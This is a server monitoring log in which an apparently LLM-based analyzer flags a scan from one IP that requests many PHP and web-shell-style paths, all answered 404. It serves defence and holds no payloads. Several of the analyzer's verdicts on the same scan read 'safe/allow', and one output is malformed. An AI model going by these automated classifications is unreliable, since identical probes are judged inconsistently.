Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008465 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.886363212Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /install.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008491 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.976322250Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.085982319Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008946 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.152925462Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008983 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.234756581Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009020 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.301778502Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.367723840Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009064 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.435098289Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009084 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.518695651Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009108 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.586076161Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /init.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009128 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.701841601Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009173 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.768665247Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009196 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.834527022Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009217 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.900442837Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /144.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009238 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.974032733Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009288 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.058084489Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009312 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.139133303Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009334 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.234423856Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009359 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.426297324Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009384 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.492090215Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009419 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.557969679Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009501 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.625061928Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /166.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:20.024428 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:20.024490 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for tfm.php path suggests probing or misconfigured resource; single event not clearly malicious but warrants attention Line=2026-03-20T12:46:01.985890551Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET //tfm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167531 [llm] Failed to parse verdict from: {
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "classification": "suspicious",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "confidence": 0.65,
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "reason": "404 response for a suspicious PHP file (8xyz.php) often indicates probing for web shells or misconfigurations.",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "action": "alert",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "pattern_type": "prefix",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "pattern": "<IP> - - <TS> \"GET /8xyz.php HTTP/1.0\" 404",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "source_hint": "nginx",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   "variable_fields": [
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:     {"token": "2026-03-20T12:46:02.052530966Z", "type": "timestamp", "replacement": "<TS>"},
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:     {"token": "10.0.1.9", "type": "ip", "replacement": "<IP>"},
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:     {"token": "4.204.200.32", "type": "ip", "replacement": "<IP>"`
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]:   ]
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: }
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167567 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: invalid character '`' after object key:value pair
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167576 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-20T12:46:02.052530966Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /8xyz.php HTTP/1.0" 40...
Mar 20 12:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:31.935418 [observer] Pipeline: processed=5243 pattern_hits=5122 llm_calls=121 llm_errors=3 learned=3
Mar 20 12:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:31.935443 [observer] Patterns: hash=5122 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=121
Mar 20 12:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:34.009866 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:34.009898 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to RIP.php with a 404 suggests probing for PHP files; could be an automated scan or misconfigured client. Line=2026-03-20T12:46:02.120804748Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /RIP.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:41.111342 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:41.111381 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a PHP file (ioxi.php) returning 404 can indicate probing for vulnerable scripts or misconfigured endpoints. Line=2026-03-20T12:46:02.187067586Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ioxi.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:47.657798 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:47.657829 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 response to a request for /nc4.php can indicate probing for vulnerable scripts; not definitive malicious but warrants alert. Line=2026-03-20T12:46:02.269114906Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /nc4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:52.165778 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:52.165815 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a request to /wp-ssfc.php suggests a probable probe for WordPress-related vulnerability files. Line=2026-03-20T12:46:02.340337073Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /wp-ssfc.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:58.376410 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:58.376444 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file returned 404, which can indicate probing for web scripts; not definitive but warrants attention. Line=2026-03-20T12:46:02.407046635Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws75.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:01.954918 [observer] Pipeline: processed=5250 pattern_hits=5124 llm_calls=126 llm_errors=3 learned=3
Mar 20 12:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:01.954951 [observer] Patterns: hash=5124 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=126
Mar 20 12:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:04.526493 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 12:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:04.526525 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to ws78.php with a 404 Not Found could indicate probing for web shells or vulnerable scripts; not definitive abuse but warrants attention. Line=2026-03-20T12:46:02.474313341Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws78.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:11.615705 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:47:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:11.615740 [analyzer] Source hint mismatch: LLM says "nginx/apache access log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:47:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:20.189941 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:47:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:20.189976 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Requests to /000.php are commonly probed files in web server scans; 404 plus PHP file target suggests a probe rather than legitimate traffic Line=2026-03-20T12:46:02.606578512Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /000.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:26.200836 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:26.200874 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file named w3lls.php could indicate probing for vulnerable scripts or misconfiguration attempts; unusual filename in GET request stands out as potential scan. Line=2026-03-20T12:46:02.722193037Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /w3lls.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:31.940153 [observer] Pipeline: processed=5258 pattern_hits=5128 llm_calls=130 llm_errors=3 learned=3
Mar 20 12:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:31.940197 [observer] Patterns: hash=5128 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=130
Mar 20 12:47:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:32.011373 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:32.011411 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a php file (ws86.php) can indicate probing for vulnerable scripts or misconfigured endpoints. While not definitive, it warrants attention. Line=2026-03-20T12:46:02.788398414Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws86.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:37.442260 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:37.442296 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file returning 404 suggests potential probing for web shell or vulnerable paths. Line=2026-03-20T12:46:02.856022501Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /xwx1.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:42.672399 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:42.672431 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /ggb.php suggests probing for a potential PHP file; could be automated scanning Line=2026-03-20T12:46:02.933022077Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ggb.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:50.344099 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:50.344135 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single request for a PHP file (/xff.php) resulting in 404 may indicate probing for sensitive files; not definitive malicious activity but warrants monitoring. Line=2026-03-20T12:46:03.009959227Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /xff.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198364 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198399 [hints] Suggestion for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: field type "ip" seen in 35/20 lines, example: "4.204.200.32" → "<IP>"
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198409 [hints] Suggestion for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: field type "timestamp" seen in 19/20 lines, example: "2026-03-20T12:46:03.077603153Z" → ""
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198419 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a non-existent PHP file (wwx.php) returning 404, across a web service, suggests probing or unwanted scanning activity. Line=2026-03-20T12:46:03.077603153Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /wwx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:01.954498 [observer] Pipeline: processed=5265 pattern_hits=5130 llm_calls=135 llm_errors=3 learned=3
Mar 20 12:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:01.954532 [observer] Patterns: hash=5130 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=135
Mar 20 12:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:05.459344 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:05.459385 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:12.746126 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:12.746183 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 on a request to /ws77.php can indicate probing for vulnerable PHP files or misconfigured routes; not definitive malicious activity but warrants attention. Line=2026-03-20T12:46:03.220820436Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /ws77.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:23.217933 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 12:48:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:23.217968 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to gifclass.php returning 404 from external IP suggests a probe or scan for a known file (gifclass.php). Not definitive malicious but warrants alerting. Line=2026-03-20T12:46:03.290176691Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /gifclass.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:29.820748 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:48:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:29.820781 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /8.php (a common probe for php info or vulnerability scanning) returning 404; could indicate reconnaissance activity. Line=2026-03-20T12:46:03.367291351Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /8.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:31.934424 [observer] Pipeline: processed=5273 pattern_hits=5134 llm_calls=139 llm_errors=3 learned=3
Mar 20 12:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:31.934447 [observer] Patterns: hash=5134 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=139
Mar 20 12:48:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:35.964374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:48:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:35.964412 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /155.php returning 404 could indicate probing for PHP files common in automated scans; not definitive but warrants monitoring. Line=2026-03-20T12:46:03.435911954Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /155.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:43.803407 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix
Mar 20 12:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:43.803444 [analyzer] Source hint mismatch: LLM says "webserver access_log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
